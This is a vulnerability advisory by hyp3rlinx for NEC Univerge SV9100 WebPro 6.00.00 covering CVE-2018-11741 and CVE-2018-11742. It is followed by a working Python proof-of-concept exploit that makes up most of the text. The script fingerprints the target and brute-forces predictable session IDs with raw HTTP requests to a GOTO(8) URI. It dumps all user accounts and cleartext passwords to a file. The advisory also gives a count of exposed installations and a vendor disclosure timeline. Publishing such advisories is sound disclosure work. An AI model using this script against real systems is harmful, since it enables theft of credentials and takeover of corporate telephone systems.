1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 |
''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source:http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B. 0day*** [Vendor] www.necam.com [Affected Product Code Base] NEC Univerge Sv9100 WebPro - 6.00.00 NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems. Public facing installations as of Dec 1, 2018 https://www.shodan.io/search?query=Server+Henry Result: 7,797 [Vulnerability Type(s)] [CVE Reference(s)] Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742 [Attack Vectors] Make repeated remote HTTP requests until arriving at a valid authenticated sessionId. Security Issue: ================ NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI. Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords. e.g.. curlhttp://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8) Exploit/POC: ============= ''' from socket import * import re #Univerge Sv9100 NEC WebPro : 6.00 #Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage #http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords. print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC" print "hyp3rlinx" IP=raw_input("[+] TARGET> ") res='' findme="Programming Password Setup" cnt=0 tmp=False tmp2=False pwned=False #check application is NEC and vuln version def is_NEC_webpro(u): global tmp,tmp2,cnt res='' cnt+=1 s=socket(AF_INET, SOCK_STREAM) s.connect((IP,80)) s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n') while True: res=s.recv(4048) if res.find('</html>')!=-1: break s.close() if re.findall(r"\bWebPro\b", res): tmp=True if tmp and cnt < 3: is_NEC_webpro('/Login.htm') if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res): tmp2 = True if tmp == True and tmp2 == True: return True return False def dump(acct): file=open('NEC-Accounts.txt', 'w') file.write(acct+'\n') file.close() def breach(sid): global pwned try: s=socket(AF_INET, SOCK_STREAM) s.connect((IP,80)) sid=str(sid) print 'trying sessid '+sid s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n') except Exception as e: print str(e) while True: res = s.recv(4096) if res.find('</html>')!=-1: break if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session. dump(res) print res pwned=True s.close() return pwned def sessgen(): for sessid in range(1000,15000): ##test 14109 if breach(sessid): break if __name__=='__main__': if is_NEC_webpro('/'): sessgen() else: print 'Not NEC or version not vuln.' ''' Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ============================= Vendor Notification:May 15, 2018 No reply Vendor Notification: May 18, 2018 No reply Vendor Notification:June 4, 2018 No reply Mitre assign CVE: June 5, 2018 JPCERT replies: June 6, 2018 JPCERT shares information with NEC : June 7, 2018 Request status : August 11, 2018 JPCERT contact NEC : August 14, 2018 No reply from vendor Request status : August 21, 2018 JPCERT again contacts NEC : August 21, 2018 JPCERT "vendor working on a release" : August 23 2018 JPCERT "Vendor release October 2018" : September 12, 2018 NEC "Requests public disclosure after December 1st." : November 19, 2018 December 2, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). ''' |